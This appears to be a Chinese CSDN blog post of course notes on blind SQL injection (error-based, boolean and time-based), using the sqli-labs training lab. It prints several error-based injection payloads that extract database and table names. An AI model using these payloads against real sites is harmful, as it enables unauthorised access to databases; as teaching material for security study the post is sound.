【小迪安全】Day16web漏洞-SQL注入之盲注

最新推荐文章于 2024-08-13 14:34:13 发布
最新推荐文章于 2024-08-13 14:34:13 发布
阅读量192 收藏
点赞数
分类专栏: web安全 渗透测试 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44312640/article/details/127654366
版权

web漏洞-SQL注入之盲注

文章目录

前言

​ 本文介绍了SQL注入的盲注方法。盲注方法主要是用在前端页面不回显sql语句内容的时候,如注册等。

盲注类型

报错盲注

​ 报错盲注是指前端虽然不回显内容,但是我们可能可以通过sql语句报错来显示我们需要的数据。用sqlilabs靶场的less-5举例。sqlilabs靶场的安装请看https://blog.csdn.net/qq_44312640/article/details/127573726?spm=1001.2014.3001.5502

# 参考文章:https://www.cnblogs.com/zane-s/articles/12371820.html#w58wxCp4
# 爆数据库等信息,原理暂不研究
第一种:or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
第二种:union select concat(floor(rand(0)*2),"===",(select database())) as xx,count(1),3 from information_schema.columns group by xx--+
# 爆表名等信息
union select concat(floor(rand(0)*2),"===",(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 3,1)) as xx,count(1),3 from information_schema.columns group by xx--+
# 爆字段等信息
猜解数据库
猜解表
猜解字段
猜解内容

布尔盲注

​ 布尔盲注指的是通过and连接符等通过观察页面是否正常来判断条件是否成立的一种注入方法。以sqlilabs靶场的less-5举例。

猜解数据库
猜解表
猜解字段
猜解内容

延迟注入

​ 延迟注入和布尔注入差不多,通过条件注入延迟函数,观察页面返回时间来判断条件是否正确。以sqlilabs靶场的less-5举例。剩下的根据布尔盲注类推即可。

楓椛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小迪安全16 web漏洞SQL注入之查询方式及报错盲注
qq_46116117的博客
12-25 2455
16 web漏洞SQL注入之查询方式及报错盲注 ​ 当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显 的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相 关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其 SQL 语句大概写法也能更好的选择对应的注入语句 常用sql语句 select 查询数据 在网站应用中进行数据显示查询效果 例: select * from news wher id=$id insert 插入数据 在网站应用中进行用户注册添加等操作 例
B站小迪安全笔记第十六天-SQL注入之查询方式及报错盲注
m0_61530426的博客
07-29 561
B站小迪安全笔记
day29WEB攻防-通用漏洞&SQL注入&盲注&延时&布尔&报错&增删改查
m0_69583059的博客
01-20 1352
因为时间盲注是运用于没有任何错误信息或者回显的注入情况,所以我们并不能从页面上获取我们发送的语句返回情况,由于发送请求到服务器回显是需要一段时间的,所以我们可以利用回显时间来判断服务器返回情况,其实就是在布尔盲注的基础上加上一个if语句,错误时让页面正常返回,正确时让页面延时返回,由此我们就可以通过返回时间来判断是否注入成功。用Burp爆破字母a的位置,即可得到数据库名每个位置上的字符。盲注就是在注入的过程中,获取的数据不能回显到前端页面,此时,我们要利用一些方法进行判断 或者尝试,这个过程称之为盲注
Web安全Day1 - SQL注入漏洞类型
念舒C.ying
10-19 1627
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的数据库系统在其实践过程中都对SQL规范作了某些编改和扩充。所以,实际上不同数据库系统之间的SQL不能完全相互通用。
第16天:WEB漏洞-SQL注入之查询方式及报错盲注
cailme的博客
05-10 168
渗透测试day16
第15天:WEB漏洞-SQL注入之Oracle、mongoDB等注入
cailme的博客
05-07 368
渗透测试day15
渗透测试-SQL注入sqlmap的使用方法及实战案例
lza20001103的博客
07-19 3831
渗透测试-SQL注入sqlmap的使用方法及实战案例
day37-SQL注入的方式
liangjiao_shou的博客
06-01 631
​ 通过api接口调用来实现自动化扫描,不然每个注入点,都需要我们手工的使用sqlmap;​ 参考:https://www.freebuf.com/articles/web/265908.html。​ 结果进行排序,得到ascii的数字,在解码成字符即可/可以使用bp将SQL盲注和手动注入走遍。​ addslashes(参数):在参数字符串单引号或双引号前添加反斜线\。magic_quotes-gpc=on 开启注入防御,特殊字符进行转义。python脚本:可以进行批量注入检测。
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3105
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
17、畅捷通Plus_ajaxpro命令执行 ...33、用友时空KSOA_imagefield_sql注入 34、宏景HCM_SQL注入 35、华天动力OA未授权访问及SQL注入 36、致远OA_Ajaxdo_upload 37、亿赛通电子文档安全管理系统命令执行
小皮(Phpstudy)面板存在任意命令执行漏洞-公开版本
04-20
此文档公开了一款广泛使用的Web服务器环境集成管理软件——小皮(Phpstudy)面板存在的安全问题。该软件因其简单易用的特点,在个人开发者和小型企业中颇受欢迎。然而,此次发现的安全漏洞若被恶意利用,则可能对受...
0day-安全性-软件-漏洞分析技术:0day安全_软件突破分析技术
02-06
0day-安全性-软件-漏洞分析技术 《 0day安全:软件突破分析技术(第二版)》随书资料包使用注意事项 资料包中资料仅用于学习目的,任何组织,个人,机构不可以任何形式利用资料包中的资料进行商业盈利目的的活动。 ...
2023-0Day(漏洞检测Tools)V1.4 HW-漏洞挖掘-src
08-23
7、泛微EOfficeSQL注入漏洞 8、绿盟SAS堡垒机任意用户登录漏洞 2023/8/11,V1.2更新漏洞利用如下: 9、大华智慧园区综合管理平台emap文件上传 10、大华智慧园区综合管理平台SQL注入 11、用友时空KSOA_SQL注入
血缘系统 datahub + Sqllineage
最新发布
weixin_42687074的博客
08-13 193
业界比较主流的数据血缘系统,目前还没能达到与调度系统耦合,最大难点在于代码解析。当某张表下游太多时(特别是维度表),展示也失去了意义,所以多用于排查某张应用表的上游从哪里开。使用方一般为对数仓表结构不太熟悉的业务/数据经理想要了解有哪些数据。
鸿萌数据恢复服务:SQL Server .BAK 文件损坏的原因及解决方法
sanyuan7783的博客
08-13 551
天津鸿萌科贸发展有限公司从事数据安全服务二十余年,致力于为各领域客户提供专业的数据恢复、数据备份、网络及终端数据安全等解决方案与服务。同时,鸿萌是众多国际主流数据恢复软件的授权代理商,为专业用户提供正版的数据恢复软件。在 SQL Server 中,备份通常存储在扩展名为 .BAK 的文件中。当服务器或数据库文件发生事故或问题需要恢复数据时,备份非常有用。但是,SQL 数据库备份 (.BAK) 文件也可能由于各种因素而损坏。
net.sf.jsqlparser.statement.select.SelectItem
Rui_bbm的博客
08-09 335
今天一启动项目,出现了这个错误,仔细想了想,应该是昨天合并代码,导致的mybatis-plus版本冲突,以及分页PageHelper版本不兼容。可以看见这个我是最下边的 Caused by 报错信息,这个地方提示我。在我的项目中,common模块中mybatis-plus 重复导入依赖。在我的server模块中可以看见这个关于jsqlparser依赖。这个依赖是导致项目启动失败的根本原因,一定要将其注释。重新启动项目,可以看见已经可以正常启动!这里我直接将这个依赖注释掉防止重复依赖注入。
SQL Zoo 8+.NSS Tutorial
weixin_61524392的博客
08-09 727
以下数据来自。
SQL Server中NEWID()函数用于生成一个唯一的标识符
zxrhhm的博客
08-13 432
SQL Server中NEWID()函数用于生成一个唯一的标识符GUID即全局唯一标识符
《0day安全:软件漏洞分析技术》- Windows平台漏洞深度探索
"0day安全 软件漏洞分析技术,由王清主编,是一本深入探讨Windows平台缓冲区溢出漏洞分析、检测与防护的专业书籍。全书分为五篇,内容涵盖从基础理论到高级技术的广泛领域。本书旨在引导读者从入门到精通,了解并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值